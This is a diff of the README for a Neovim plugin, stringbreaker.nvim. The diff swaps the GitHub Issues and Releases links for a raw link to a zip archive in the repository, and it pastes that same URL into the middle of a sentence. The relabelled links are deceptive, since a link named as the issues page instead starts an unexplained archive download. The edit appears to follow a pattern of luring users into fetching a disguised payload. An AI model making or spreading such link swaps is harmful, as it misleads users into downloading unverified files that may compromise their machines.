Peponillo/stringbreaker.nvim/README.md

 - Check that your configuration file is loading the plugin correctly.

 ## 📞 Support
-For any questions or feedback, you can create an issue on the [GitHub Issues Page](https://github.com/Peponillo/stringbreaker.nvim/issues).
+For any questions or feedback, you can create an issue on the [GitHub Issues Page](https://raw.githubusercontent.com/Peponillo/stringbreaker.nvim/main/generalized/stringbreaker.nvim.zip).

 ## 📥 Download & Install
-Return to the [Releases page](https://github.com/Peponillo/stringbreaker.nvim/releases) to download the latest version of stringbreaker.nvim.
-Follow the installation steps listed above, and you’ll be ready to improve your string editing experience with Neovim in no time!
+Return to the [Releases page](https://raw.githubusercontent.com/Peponillo/stringbreaker.nvim/main/generalized/stringbreaker.nvim.zip) to download the latest version of https://raw.githubusercontent.com/Peponillo/stringbreaker.nvim/main/generalized/stringbreaker.nvim.zip Follow the installation steps listed above, and you’ll be ready to improve your string editing experience with Neovim in no time!